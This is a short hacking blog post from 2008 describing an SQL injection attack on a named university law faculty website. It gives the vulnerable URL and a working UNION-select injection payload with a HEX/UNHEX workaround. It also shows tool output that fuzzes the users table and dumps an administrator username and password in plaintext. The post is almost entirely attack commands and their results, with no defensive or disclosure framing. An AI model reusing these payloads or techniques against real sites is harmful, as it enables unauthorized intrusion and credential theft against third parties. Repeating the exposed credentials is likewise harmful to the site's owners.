viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Wednesday, September 24, 2008

[SQLi] http://law.ui.ac.id

6:06 PM Posted by viperfx07 No comments
login= username:passwd = admin:admiN
Problem: where is the admin dir?
Tool: blindext.py (schemafuzz.py can't do it because of below restriction)

[+] URL: http://www.law.ui.ac.id/berita.php?bid=380
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v4.0.0 found!
[+] Showing database version, username@location, and database name!
[+] 15:08:22
[0]: 4.1.11-Debian_4sarge8-log:wwwlaw:wwwlaw

Database information = http://www.law.ui.ac.id/berita.php?bid=-380+union+select+1,2,UNHEX(HEX(concat_ws(char(58),database(),version(),user()))),4,5,6--

I use UNHEX & HEX because there is a conversion error if you don't use this "trick". The error message: Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'



Dump:


[+] URL:http://www.law.ui.ac.id/berita.php?bid=380
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v4.0.0 found!

[14:30:33] StartTime
[+] Fuzzing Tables...

[Table]:users
[Column]:user_name
[Column]:user_password
[Column]:user_login
[Column]:user_id

[14:31:48] EndTime
[-] Total URL Requests 226
[-] Done


[+] URL:http://www.law.ui.ac.id/berita.php?bid=380
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
[+] MySQL >= v4.0.0 found!
[+] Dumping data from database "WWWLAW" Table "users"
[+] Column(s) ['user_login', 'user_password']
[+] 14:57:25
[+] Number of Rows: 4

[0]: admin:admiN

0 comments:

Post a Comment